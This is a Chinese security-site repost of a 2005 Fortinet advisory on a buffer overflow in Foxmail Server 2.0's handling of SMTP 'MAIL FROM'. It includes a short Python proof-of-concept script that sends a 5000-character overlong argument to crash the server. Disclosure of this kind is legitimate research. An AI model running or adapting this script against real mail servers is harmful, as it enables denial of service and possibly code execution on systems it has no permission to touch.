首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FOXmail POC exploit
来源:www.fortinet.com 作者:xouyang 发布时间:2005-02-12  

DATE:
02/04/2005

AUTHOR:
(Fortinet, inc)
xouyang<xouyang_at_fortinet.com> <oyxin@segfault.cn>

PRODUCTS:
Foxmail Server- A MAil server for both Windows and linux.

AFFECTED VERSION:
Foxmail server for windows version 2.0(Newest).I just test windows server ,maybe linux version have vulnerability too.

Description:
Foxmail-the Email client application is the most famous software product in China. Chinese version is sold to more than 3 million users and English version to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated as "5 Star Software" by ZDNET.
BODA s NT/Linux-based email server system is featured by stability, security, ease of installation and maintenance, rich functions. Different versions of product can meet the varied needs ranging from small/medium- sized enterprises to ISPs/ICPs/ASPs.

DOWNLOAD:
http://www.foxmail.com.cn/english/english_3.htm
http://fox.foxmail.com.cn/cgi/download/nt/nph-install_nt.cgi

Detail:
A vulnerabilities have been identified in Foxmail server , which can be exploited by malicious people to cause a DoS (Denial of Service) or maybe compromise a vulnerable server.

The vulnerabilities are caused due to boundary errors in the handling of the "MAIL FROM:" commands. A malicious person can exploit this by supplying a long, specially crafted argument to the vulnerable commands, which will result in a buffer overflow.

Successful exploitation will cause a DOS or maybe allow execution of arbitrary code with SYSTEM privileges.

FOXmail POC exploit:

#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
print "Usage: foxserver.py -h host -p port"
sys.exit(0)

if __name__ == '__main__':

try:
opts, args = getopt.getopt(sys.argv[1:], "h:p:")
except getopt.GetoptError, msg:
print msg
usage()

for o,a in opts:
if o in ["-h"]:
host = a
if o in ["-p"]:
port = int(a)

evilbuf = "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
evilbuf += "RCPT-TO: postmaster@company.mailDATA" + "\r\n"
evilbuf += "Message-ID: 123" + "\r\n"
evilbuf += "ASDF" + "\r\n"
evilbuf += "." + "\r\n"
evilbuf += "QUIT" + "\r\n"
try:
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((host, port))
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send("HELO localhost\r\n")
recvbuf = sockfd.recv(1024)
print `recvbuf`
sockfd.send(evilbuf)
except socket.error, msg:
print msg

sockfd.close()


THANKS:
Thanks felix and Ning Wang who in fortinet security research team to verify this Vulnerability



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MSN Messenger PNG Image Buffer
·Savant Web Server 3.1 Remote B
·ASPNuke comments.asp and detai
·CA BrightStor ARCserve Backup
·phpBB Knowledge Base模块SQL注
·Exim 4.x 'spa_base64_to_bits()
·BitchX Buffer Overflow
·CA BrightStor ARCserve Backup
·ICMP Attacks Against TCP Vulne
·CA BrightStor ARCserve Discove
·Multiple Exploit Codes for Ora
·PHP-Nuke POST Method Admin Var
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved